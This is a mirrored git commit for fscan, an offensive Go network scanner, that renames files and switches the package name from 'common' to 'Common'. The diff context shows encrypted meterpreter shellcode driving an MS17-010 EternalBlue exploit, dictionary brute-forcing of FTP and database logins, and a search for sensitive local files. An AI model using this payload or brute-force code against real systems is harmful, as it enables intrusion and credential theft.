mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-07-13 21:02:44 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity

refactor: 规范化文件命名

Browse Source
This commit is contained in:
ZacharyZcR 2024-12-18 22:00:18 +08:00
parent ab14b15864
commit 5d9bcaaadc
42 changed files with 334 additions and 334 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
common/Parse.go → Common/Parse.go
View File

@ -1,4 +1,4 @@
package common
package Common
import (
"bufio"

2
common/ParseIP.go → Common/ParseIP.go
View File

@ -1,4 +1,4 @@
package common
package Common
import (
"bufio"

2
common/ParsePort.go → Common/ParsePort.go
View File

@ -1,4 +1,4 @@
package common
package Common
import (
"strconv"

10
Plugins/CVE-2020-0796.go
View File

@ -6,7 +6,7 @@ import (
"github.com/shadow1ng/fscan/Config"
"time"
"github.com/shadow1ng/fscan/common"
"github.com/shadow1ng/fscan/Common"
)
const (
@ -96,7 +96,7 @@ const (
)
func SmbGhost(info *Config.HostInfo) error {
if common.IsBrute {
if Common.IsBrute {
return nil
}
err := SmbGhostScan(info)
@ -104,9 +104,9 @@ func SmbGhost(info *Config.HostInfo) error {
}
func SmbGhostScan(info *Config.HostInfo) error {
ip, port, timeout := info.Host, 445, time.Duration(common.Timeout)*time.Second
ip, port, timeout := info.Host, 445, time.Duration(Common.Timeout)*time.Second
addr := fmt.Sprintf("%s:%v", info.Host, port)
conn, err := common.WrapperTcpWithTimeout("tcp", addr, timeout)
conn, err := Common.WrapperTcpWithTimeout("tcp", addr, timeout)
if err != nil {
return err
}
@ -123,7 +123,7 @@ func SmbGhostScan(info *Config.HostInfo) error {
}
if bytes.Contains(buff[:n], []byte("Public")) == true && len(buff[:n]) >= 76 && bytes.Equal(buff[72:74], []byte{0x11, 0x03}) && bytes.Equal(buff[74:76], []byte{0x02, 0x00}) {
result := fmt.Sprintf("[+] %v CVE-2020-0796 SmbGhost Vulnerable", ip)
common.LogSuccess(result)
Common.LogSuccess(result)
}
return err
}

22
Plugins/ftp.go → Plugins/FTP.go
View File

@ -3,14 +3,14 @@ package Plugins
import (
"fmt"
"github.com/jlaffaye/ftp"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strings"
"time"
)
func FtpScan(info *Config.HostInfo) (tmperr error) {
if common.IsBrute {
if Common.IsBrute {
return
}
starttime := time.Now().Unix()
@ -19,27 +19,27 @@ func FtpScan(info *Config.HostInfo) (tmperr error) {
return err
} else {
errlog := fmt.Sprintf("[-] ftp %v:%v %v %v", info.Host, info.Ports, "anonymous", err)
common.LogError(errlog)
Common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
if Common.CheckErrs(err) {
return err
}
}
for _, user := range common.Userdict["ftp"] {
for _, pass := range common.Passwords {
for _, user := range Common.Userdict["ftp"] {
for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
flag, err := FtpConn(info, user, pass)
if flag && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] ftp %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog)
Common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
if Common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * common.Timeout) {
if time.Now().Unix()-starttime > (int64(len(Common.Userdict["ftp"])*len(Common.Passwords)) * Common.Timeout) {
return err
}
}
@ -51,7 +51,7 @@ func FtpScan(info *Config.HostInfo) (tmperr error) {
func FtpConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(common.Timeout)*time.Second)
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(Common.Timeout)*time.Second)
if err == nil {
err = conn.Login(Username, Password)
if err == nil {
@ -73,7 +73,7 @@ func FtpConn(info *Config.HostInfo, user string, pass string) (flag bool, err er
}
}
}
common.LogSuccess(result)
Common.LogSuccess(result)
}
}
return flag, err

8
Plugins/findnet.go → Plugins/FindNet.go
View File

@ -4,8 +4,8 @@ import (
"bytes"
"encoding/hex"
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strconv"
"strings"
"time"
@ -24,12 +24,12 @@ func Findnet(info *Config.HostInfo) error {
func FindnetScan(info *Config.HostInfo) error {
realhost := fmt.Sprintf("%s:%v", info.Host, 135)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil {
return err
}
defer conn.Close()
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil {
return err
}
@ -119,6 +119,6 @@ func read(text []byte, host string) error {
}
result += "\n [->]" + string(host)
}
common.LogSuccess(result)
Common.LogSuccess(result)
return nil
}

16
Plugins/icmp.go → Plugins/ICMP.go
View File

@ -3,7 +3,7 @@ package Plugins
import (
"bytes"
"fmt"
"github.com/shadow1ng/fscan/common"
"github.com/shadow1ng/fscan/Common"
"golang.org/x/net/icmp"
"net"
"os/exec"
@ -25,7 +25,7 @@ func CheckLive(hostslist []string, Ping bool) []string {
for ip := range chanHosts {
if _, ok := ExistHosts[ip]; !ok && IsContain(hostslist, ip) {
ExistHosts[ip] = struct{}{}
if common.Silent == false {
if Common.Silent == false {
if Ping == false {
fmt.Printf("(icmp) Target %-15s is alive\n", ip)
} else {
@ -47,7 +47,7 @@ func CheckLive(hostslist []string, Ping bool) []string {
if err == nil {
RunIcmp1(hostslist, conn, chanHosts)
} else {
common.LogError(err)
Common.LogError(err)
//尝试无监听icmp探测
fmt.Println("trying RunIcmp2")
conn, err := net.DialTimeout("ip4:icmp", "127.0.0.1", 3*time.Second)
@ -59,7 +59,7 @@ func CheckLive(hostslist []string, Ping bool) []string {
if err == nil {
RunIcmp2(hostslist, chanHosts)
} else {
common.LogError(err)
Common.LogError(err)
//使用ping探测
fmt.Println("The current user permissions unable to send icmp packets")
fmt.Println("start ping")
@ -72,17 +72,17 @@ func CheckLive(hostslist []string, Ping bool) []string {
close(chanHosts)
if len(hostslist) > 1000 {
arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, true)
arrTop, arrLen := ArrayCountValueTop(AliveHosts, Common.LiveTop, true)
for i := 0; i < len(arrTop); i++ {
output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0.0/16", arrLen[i])
common.LogSuccess(output)
Common.LogSuccess(output)
}
}
if len(hostslist) > 256 {
arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, false)
arrTop, arrLen := ArrayCountValueTop(AliveHosts, Common.LiveTop, false)
for i := 0; i < len(arrTop); i++ {
output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0/24", arrLen[i])
common.LogSuccess(output)
Common.LogSuccess(output)
}
}

8
Plugins/localinfo.go → Plugins/LocalInfo.go
View File

@ -2,8 +2,8 @@ package Plugins
import (
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"os"
"path/filepath"
"runtime"
@ -93,7 +93,7 @@ func LocalInfoScan(info *Config.HostInfo) (err error) {
home, err := os.UserHomeDir()
if err != nil {
errlog := fmt.Sprintf("[-] Get UserHomeDir error: %v", err)
common.LogError(errlog)
Common.LogError(errlog)
return err
}
@ -148,7 +148,7 @@ func scanFixedLocations(home string) {
func checkAndLogFile(path string) {
if _, err := os.Stat(path); err == nil {
result := fmt.Sprintf("[+] Found sensitive file: %s", path)
common.LogSuccess(result)
Common.LogSuccess(result)
}
}
@ -202,7 +202,7 @@ func searchSensitiveFiles() {
fileName := strings.ToLower(info.Name())
if strings.Contains(fileName, white) {
result := fmt.Sprintf("[+] Found potential sensitive file: %s", path)
common.LogSuccess(result)
Common.LogSuccess(result)
break
}
}

20
Plugins/ms17010-exp.go → Plugins/MS17010-Exp.go
View File

@ -5,8 +5,8 @@ import (
"encoding/binary"
"encoding/hex"
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"io"
"io/ioutil"
"net"
@ -17,7 +17,7 @@ import (
func MS17010EXP(info *Config.HostInfo) {
address := info.Host + ":445"
var sc string
switch common.SC {
switch Common.SC {
case "bind":
//msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=64531 -f hex
sc_enc := "gUYe7vm5/MQzTkSyKvpMFImS/YtwI+HxNUDd7MeUKDIxBZ8nsaUtdMEXIZmlZUfoQacylFEZpu7iWBRpQZw0KElIFkZR9rl4fpjyYNhEbf9JdquRrvw4hYMypBbfDQ6MN8csp1QF5rkMEs6HvtlKlGSaff34Msw6RlvEodROjGYA+mHUYvUTtfccymIqiU7hCFn+oaIk4ZtCS0Mzb1S5K5+U6vy3e5BEejJVA6u6I+EUb4AOSVVF8GpCNA91jWD1AuKcxg0qsMa+ohCWkWsOxh1zH0kwBPcWHAdHIs31g26NkF14Wl+DHStsW4DuNaxRbvP6awn+wD5aY/1QWlfwUeH/I+rkEPF18sTZa6Hr4mrDPT7eqh4UrcTicL/x4EgovNXA9X+mV6u1/4Zb5wy9rOVwJ+agXxfIqwL5r7R68BEPA/fLpx4LgvTwhvytO3w6I+7sZS7HekuKayBLNZ0T4XXeM8GpWA3h7zkHWjTm41/5JqWblQ45Msrg+XqD6WGvGDMnVZ7jE3xWIRBR7MrPAQ0Kl+Nd93/b+BEMwvuinXp1viSxEoZHIgJZDYR5DykQLpexasSpd8/WcuoQQtuTTYsJpHFfvqiwn0djgvQf3yk3Ro1EzjbR7a8UzwyaCqtKkCu9qGb+0m8JSpYS8DsjbkVST5Y7ZHtegXlX1d/FxgweavKGz3UiHjmbQ+FKkFF82Lkkg+9sO3LMxp2APvYz2rv8RM0ujcPmkN2wXE03sqcTfDdjCWjJ/evdrKBRzwPFhjOjUX1SBVsAcXzcvpJbAf3lcPPxOXM060OYdemu4Hou3oECjKP2h6W9GyPojMuykTkcoIqgN5Ldx6WpGhhE9wrfijOrrm7of9HmO568AsKRKBPfy/QpCfxTrY+rEwyzFmU1xZ2lkjt+FTnsMJY8YM7sIbWZauZ2S+Ux33RWDf7YUmSGlWC8djqDKammk3GgkSPHjf0Qgknukptxl977s2zw4jdh8bUuW5ap7T+Wd/S0ka90CVF4AyhonvAQoi0G1qj5gTih1FPTjBpf+FrmNJvNIAcx2oBoU4y48c8Sf4ABtpdyYewUh4NdxUoL7RSVouU1MZTnYS9BqOJWLMnvV7pwRmHgUz3fe7Kx5PGnP/0zQjW/P/vgmLMh/iBisJIGF3JDGoULsC3dabGE5L7sXuCNePiOEJmgwOHlFBlwqddNaE+ufor0q4AkQBI9XeqznUfdJg2M2LkUZOYrbCjQaE7Ytsr3WJSXkNbOORzqKo5wIf81z1TCow8QuwlfwIanWs+e8oTavmObV3gLPoaWqAIUzJqwD9O4P6x1176D0Xj83n6G4GrJgHpgMuB0qdlK"
@ -34,16 +34,16 @@ func MS17010EXP(info *Config.HostInfo) {
sc_enc := "Teobs46+kgUn45BOBbruUdpBFXs8uKXWtvYoNbWtKpNCtOasHB/5Er+C2ZlALluOBkUC6BQVZHO1rKzuygxJ3n2PkeutispxSzGcvFS3QJ1EU517e2qOL7W2sRDlNb6rm+ECA2vQZkTZBAboolhGfZYeM6v5fEB2L1Ej6pWF5CKSYxjztdPF8bNGAkZsQhUAVW7WVKysZ1vbghszGyeKFQBvO9Hiinq/XiUrLBqvwXLsJaybZA44wUFvXC0FA9CZDOSD3MCX2arK6Mhk0Q+6dAR+NWPCQ34cYVePT98GyXnYapTOKokV6+hsqHMjfetjkvjEFohNrD/5HY+E73ihs9TqS1ZfpBvZvnWSOjLUA+Z3ex0j0CIUONCjHWpoWiXAsQI/ryJh7Ho5MmmGIiRWyV3l8Q0+1vFt3q/zQGjSI7Z7YgDdIBG8qcmfATJz6dx7eBS4Ntl+4CCqN8Dh4pKM3rV+hFqQyKnBHI5uJCn6qYky7p305KK2Z9Ga5nAqNgaz0gr2GS7nA5D/Cd8pvUH6sd2UmN+n4HnK6/O5hzTmXG/Pcpq7MTEy9G8uXRfPUQdrbYFP7Ll1SWy35B4n/eCf8swaTwi1mJEAbPr0IeYgf8UiOBKS/bXkFsnUKrE7wwG8xXaI7bHFgpdTWfdFRWc8jaJTvwK2HUK5u+4rWWtf0onGxTUyTilxgRFvb4AjVYH0xkr8mIq8smpsBN3ff0TcWYfnI2L/X1wJoCH+oLi67xMN+yPDirT+LXfLOaGlyTqG6Yojge8Mti/BqIg5RpG4wIZPKxX9rPbMP+Tzw8rpi/9b33eq0YDevzqaj5Uo0HudOmaPwv5cd9/dqWgeC7FJwv73TckogZGbDOASSoLK26AgBat8vCrhrd7T0uBrEk+1x/NXvl5r2aEeWCWBsULKxFh2WDCqyQntSaAUkPe3JKJe0HU6inDeS4d52BagSqmd1meY0Rb/97fMCXaAMLekq+YrwcSrmPKBY9Yk0m1kAzY+oP4nvV/OhCHNXAsUQGH85G7k65I1QnzffroaKxloP26XJPW0JEq9vCSQFI/EX56qt323V/solearWdBVptG0+k55TBd0dxmBsqRMGO3Z23OcmQR4d8zycQUqqavMmo32fy4rjY6Ln5QUR0JrgJ67dqDhnJn5TcT4YFHgF4gY8oynT3sqv0a+hdVeF6XzsElUUsDGfxOLfkn3RW/2oNnqAHC2uXwX2ZZNrSbPymB2zxB/ET3SLlw3skBF1A82ZBYqkMIuzs6wr9S9ox9minLpGCBeTR9j6OYk6mmKZnThpvarRec8a7YBuT2miU7fO8iXjhS95A84Ub++uS4nC1Pv1v9nfj0/T8scD2BUYoVKCJX3KiVnxUYKVvDcbvv8UwrM6+W/hmNOePHJNx9nX1brHr90m9e40as1BZm2meUmCECxQd+Hdqs7HgPsPLcUB8AL8wCHQjziU6R4XKuX6ivx"
sc = AesDecrypt(sc_enc, key)
default:
if strings.Contains(common.SC, "file:") {
read, err := ioutil.ReadFile(common.SC[5:])
if strings.Contains(Common.SC, "file:") {
read, err := ioutil.ReadFile(Common.SC[5:])
if err != nil {
errlog := fmt.Sprintf("[-] ms17010 sc readfile %v error: %v", common.SC, err)
common.LogError(errlog)
errlog := fmt.Sprintf("[-] ms17010 sc readfile %v error: %v", Common.SC, err)
Common.LogError(errlog)
return
}
sc = fmt.Sprintf("%x", read)
} else {
sc = common.SC
sc = Common.SC
}
}
@ -54,15 +54,15 @@ func MS17010EXP(info *Config.HostInfo) {
sc1, err := hex.DecodeString(sc)
if err != nil {
common.LogError("[-] " + info.Host + " MS17-010 shellcode decode error " + err.Error())
Common.LogError("[-] " + info.Host + " MS17-010 shellcode decode error " + err.Error())
return
}
err = eternalBlue(address, 12, 12, sc1)
if err != nil {
common.LogError("[-] " + info.Host + " MS17-010 exp failed " + err.Error())
Common.LogError("[-] " + info.Host + " MS17-010 exp failed " + err.Error())
return
}
common.LogSuccess("[*] " + info.Host + "\tMS17-010\texploit end")
Common.LogSuccess("[*] " + info.Host + "\tMS17-010\texploit end")
}
func eternalBlue(address string, initialGrooms, maxAttempts int, sc []byte) error {

18
Plugins/ms17010.go → Plugins/MS17010.go
View File

@ -5,8 +5,8 @@ import (
"encoding/hex"
"errors"
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strings"
"time"
)
@ -25,13 +25,13 @@ var (
)
func MS17010(info *Config.HostInfo) error {
if common.IsBrute {
if Common.IsBrute {
return nil
}
err := MS17010Scan(info)
if err != nil {
errlog := fmt.Sprintf("[-] Ms17010 %v %v", info.Host, err)
common.LogError(errlog)
Common.LogError(errlog)
}
return err
}
@ -39,13 +39,13 @@ func MS17010(info *Config.HostInfo) error {
func MS17010Scan(info *Config.HostInfo) error {
ip := info.Host
// connecting to a host in LAN if reachable should be very quick
conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(common.Timeout)*time.Second)
conn, err := Common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(Common.Timeout)*time.Second)
if err != nil {
//fmt.Printf("failed to connect to %s\n", ip)
return err
}
defer conn.Close()
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil {
//fmt.Printf("failed to connect to %s\n", ip)
return err
@ -132,9 +132,9 @@ func MS17010Scan(info *Config.HostInfo) error {
//if runtime.GOOS=="windows" {fmt.Printf("%s\tMS17-010\t(%s)\n", ip, os)
//} else{fmt.Printf("\033[33m%s\tMS17-010\t(%s)\033[0m\n", ip, os)}
result := fmt.Sprintf("[+] MS17-010 %s\t(%s)", ip, os)
common.LogSuccess(result)
Common.LogSuccess(result)
defer func() {
if common.SC != "" {
if Common.SC != "" {
MS17010EXP(info)
}
}()
@ -154,12 +154,12 @@ func MS17010Scan(info *Config.HostInfo) error {
if reply[34] == 0x51 {
result := fmt.Sprintf("[+] MS17-010 %s has DOUBLEPULSAR SMB IMPLANT", ip)
common.LogSuccess(result)
Common.LogSuccess(result)
}
} else {
result := fmt.Sprintf("[*] OsInfo %s\t(%s)", ip, os)
common.LogSuccess(result)
Common.LogSuccess(result)
}
return err

22
Plugins/mssql.go → Plugins/MSSQL.go
View File

@ -4,31 +4,31 @@ import (
"database/sql"
"fmt"
_ "github.com/denisenkom/go-mssqldb"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strings"
"time"
)
func MssqlScan(info *Config.HostInfo) (tmperr error) {
if common.IsBrute {
if Common.IsBrute {
return
}
starttime := time.Now().Unix()
for _, user := range common.Userdict["mssql"] {
for _, pass := range common.Passwords {
for _, user := range Common.Userdict["mssql"] {
for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
flag, err := MssqlConn(info, user, pass)
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] mssql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog)
Common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
if Common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * common.Timeout) {
if time.Now().Unix()-starttime > (int64(len(Common.Userdict["mssql"])*len(Common.Passwords)) * Common.Timeout) {
return err
}
}
@ -40,17 +40,17 @@ func MssqlScan(info *Config.HostInfo) (tmperr error) {
func MssqlConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(common.Timeout)*time.Second)
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(Common.Timeout)*time.Second)
db, err := sql.Open("mssql", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(Common.Timeout) * time.Second)
db.SetMaxIdleConns(0)
defer db.Close()
err = db.Ping()
if err == nil {
result := fmt.Sprintf("[+] mssql %v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
Common.LogSuccess(result)
flag = true
}
}

10
Plugins/memcached.go → Plugins/Memcached.go
View File

@ -2,22 +2,22 @@ package Plugins
import (
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strings"
"time"
)
func MemcachedScan(info *Config.HostInfo) (err error) {
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
client, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
defer func() {
if client != nil {
client.Close()
}
}()
if err == nil {
err = client.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
err = client.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err == nil {
_, err = client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
if err == nil {
@ -26,11 +26,11 @@ func MemcachedScan(info *Config.HostInfo) (err error) {
if err == nil {
if strings.Contains(string(rev[:n]), "STAT") {
result := fmt.Sprintf("[+] Memcached %s unauthorized", realhost)
common.LogSuccess(result)
Common.LogSuccess(result)
}
} else {
errlog := fmt.Sprintf("[-] Memcached %v:%v %v", info.Host, info.Ports, err)
common.LogError(errlog)
Common.LogError(errlog)
}
}
}

12
Plugins/mongodb.go → Plugins/Mongodb.go
View File

@ -2,20 +2,20 @@ package Plugins
import (
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strings"
"time"
)
func MongodbScan(info *Config.HostInfo) error {
if common.IsBrute {
if Common.IsBrute {
return nil
}
_, err := MongodbUnauth(info)
if err != nil {
errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err)
common.LogError(errlog)
Common.LogError(errlog)
}
return err
}
@ -49,12 +49,12 @@ func MongodbUnauth(info *Config.HostInfo) (flag bool, err error) {
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
checkUnAuth := func(address string, packet []byte) (string, error) {
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil {
return "", err
}
defer conn.Close()
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
err = conn.SetReadDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil {
return "", err
}
@ -81,7 +81,7 @@ func MongodbUnauth(info *Config.HostInfo) (flag bool, err error) {
if strings.Contains(reply, "totalLinesWritten") {
flag = true
result := fmt.Sprintf("[+] Mongodb %v unauthorized", realhost)
common.LogSuccess(result)
Common.LogSuccess(result)
}
return flag, err
}

22
Plugins/mysql.go → Plugins/MySQL.go
View File

@ -4,31 +4,31 @@ import (
"database/sql"
"fmt"
_ "github.com/go-sql-driver/mysql"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strings"
"time"
)
func MysqlScan(info *Config.HostInfo) (tmperr error) {
if common.IsBrute {
if Common.IsBrute {
return
}
starttime := time.Now().Unix()
for _, user := range common.Userdict["mysql"] {
for _, pass := range common.Passwords {
for _, user := range Common.Userdict["mysql"] {
for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
flag, err := MysqlConn(info, user, pass)
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] mysql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog)
Common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
if Common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * common.Timeout) {
if time.Now().Unix()-starttime > (int64(len(Common.Userdict["mysql"])*len(Common.Passwords)) * Common.Timeout) {
return err
}
}
@ -40,17 +40,17 @@ func MysqlScan(info *Config.HostInfo) (tmperr error) {
func MysqlConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(common.Timeout)*time.Second)
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(Common.Timeout)*time.Second)
db, err := sql.Open("mysql", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(Common.Timeout) * time.Second)
db.SetMaxIdleConns(0)
defer db.Close()
err = db.Ping()
if err == nil {
result := fmt.Sprintf("[+] mysql %v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
Common.LogSuccess(result)
flag = true
}
}

12
Plugins/NetBIOS.go
View File

@ -4,8 +4,8 @@ import (
"bytes"
"errors"
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"gopkg.in/yaml.v3"
"net"
"strconv"
@ -20,7 +20,7 @@ func NetBIOS(info *Config.HostInfo) error {
output := netbios.String()
if len(output) > 0 {
result := fmt.Sprintf("[*] NetBios %-15s %s", info.Host, output)
common.LogSuccess(result)
Common.LogSuccess(result)
return nil
}
return errNetBIOS
@ -41,12 +41,12 @@ func NetBIOS1(info *Config.HostInfo) (netbios NetBiosInfo, err error) {
}
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
var conn net.Conn
conn, err = common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
conn, err = Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil {
return
}
defer conn.Close()
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil {
return
}
@ -89,12 +89,12 @@ func GetNbnsname(info *Config.HostInfo) (netbios NetBiosInfo, err error) {
senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1}
//senddata1 := []byte("ff\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01")
realhost := fmt.Sprintf("%s:137", info.Host)
conn, err := net.DialTimeout("udp", realhost, time.Duration(common.Timeout)*time.Second)
conn, err := net.DialTimeout("udp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil {
return
}
defer conn.Close()
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil {
return
}

20
Plugins/oracle.go → Plugins/Oracle.go
View File

@ -3,32 +3,32 @@ package Plugins
import (
"database/sql"
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
_ "github.com/sijms/go-ora/v2"
"strings"
"time"
)
func OracleScan(info *Config.HostInfo) (tmperr error) {
if common.IsBrute {
if Common.IsBrute {
return
}
starttime := time.Now().Unix()
for _, user := range common.Userdict["oracle"] {
for _, pass := range common.Passwords {
for _, user := range Common.Userdict["oracle"] {
for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
flag, err := OracleConn(info, user, pass)
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] oracle %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog)
Common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
if Common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * common.Timeout) {
if time.Now().Unix()-starttime > (int64(len(Common.Userdict["oracle"])*len(Common.Passwords)) * Common.Timeout) {
return err
}
}
@ -43,14 +43,14 @@ func OracleConn(info *Config.HostInfo, user string, pass string) (flag bool, err
dataSourceName := fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", Username, Password, Host, Port)
db, err := sql.Open("oracle", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(Common.Timeout) * time.Second)
db.SetMaxIdleConns(0)
defer db.Close()
err = db.Ping()
if err == nil {
result := fmt.Sprintf("[+] oracle %v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
Common.LogSuccess(result)
flag = true
}
}

16
Plugins/portscan.go → Plugins/PortScan.go
View File

@ -2,7 +2,7 @@ package Plugins
import (
"fmt"
"github.com/shadow1ng/fscan/common"
"github.com/shadow1ng/fscan/Common"
"sort"
"strconv"
"sync"
@ -16,12 +16,12 @@ type Addr struct {
func PortScan(hostslist []string, ports string, timeout int64) []string {
var AliveAddress []string
probePorts := common.ParsePort(ports)
probePorts := Common.ParsePort(ports)
if len(probePorts) == 0 {
fmt.Printf("[-] parse port %s error, please check your port format\n", ports)
return AliveAddress
}
noPorts := common.ParsePort(common.NoPorts)
noPorts := Common.ParsePort(Common.NoPorts)
